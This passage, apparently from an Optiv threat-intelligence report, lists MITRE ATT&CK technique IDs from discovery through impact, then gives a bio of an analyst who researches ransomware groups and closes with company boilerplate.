T1016.001 System Network Configuration Discovery: Internet Connection Discovery
T1033 System Owner/User Discovery
T1087.001 Account Discovery: Local Account
T1087.002 Account Discovery: Domain Account
T1087.004 Account Discovery: Cloud Account
T1482 Domain Trust Discovery
T1069.001 Permission Groups Discovery: Local Groups
T1069.002 Permission Groups Discovery: Domain Groups
T1018 Remote System Discovery
T1040 Network Sniffing
T1615 Group Policy Discovery
T1201 Password Policy Discovery
T1012 Query Registry
T1049 System Network Connections Discovery
T1007 System Service Discovery
T1124 System Time Discovery
Lateral Movement T1534 Internal Spearphishing
T1080 Taint Shared Content
T1021.001 Remote Services: Remote Desktop Protocol
T1021.002 Remote Services: SMB/Windows Admin Shares
T1021.005 Remote Services: VNC
T1021.006 Remote Services: Windows Remote Management
T1021.007 Remote Services: Cloud Services
T1550.001 Use Alternate Authentication Material: Application Access Token
T1550.003 Use Alternate Authentication Material: Pass the Ticket
T1210 Exploitation of Remote Services
T1091 Replication Through Removable Media
T1570 Lateral Tool Transfer
Collection T1119 Automated Collection
T1074.001 Data Staged: Local Data Staging
T1074.002 Data Staged: Remote Data Staging
T1025 Data from Removable Media
T1113 Screen Capture
T1560 Archive Collected Data
T1560.001 Archive Collected Data: Archive via Utility
T1005 Data from Local System
T1213 Data from Information Repositories
T1213.002 Data from Information Repositories: SharePoint
T1213.003 Data from Information Repositories: Code Repositories
T1114.002 Email Collection: Remote Email Collection
T1039 Data from Network Shared Drive
T1123 Audio Capture
Command & Control T1132 Data Encoding
T1102 Web Service
T1102.002 Web Service: Bidirectional Communication
T1071.001 Application Layer Protocol: Web Protocols
T1071.003 Application Layer Protocol: Mail Protocols
T1568 Dynamic Resolution
T1105 Ingress Tool Transfer
T1001.001 Data Obfuscation: Junk Data
T1001.002 Data Obfuscation: Steganography
T1573 Encrypted Channel
T1573.001 Encrypted Channel: Symmetric Cryptography
T1092 Communication Through Removable Media
T1090.001 Proxy: Internal Proxy
T1090.003 Proxy: Multi-hop Proxy
T1090.004 Proxy: Domain Fronting
Exfiltration T1041 Exfiltration Over C2 Channel
T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
T1020 Automated Exfiltration
T1030 Data Transfer Size Limits
T1567 Exfiltration Over Web Service
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Impact T1561 Disk Wipe
T1561.002 Disk Wipe: Disk Structure Wipe
T1486 Data Encrypted for Impact
T1485 Data Destruction
T1491.001 Defacement: Internal Defacement
T1498 Network Denial of Service
T1529 System Shutdown/Reboot
Intelligence Analyst | Optiv
Andi Ursry has over four years of experience in Threat Intelligence. Ursry began her career in the retail sector in Loss Prevention and Safety positions. She worked on-site to help stores mitigate risks. After seeing a shift toward cybercrime, she changed focus to cyber intelligence. Ursry’s research focuses on ransomware groups and their tactics.

Prior to joining Optiv, Ursry was a Cyber Threat Intelligence Analyst for a California-based cybersecurity company that specializes in digital risk. She earned a bachelor’s and master’s degree in criminal justice from Colorado Technical University, Online.

Optiv Security: Secure greatness.®

Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit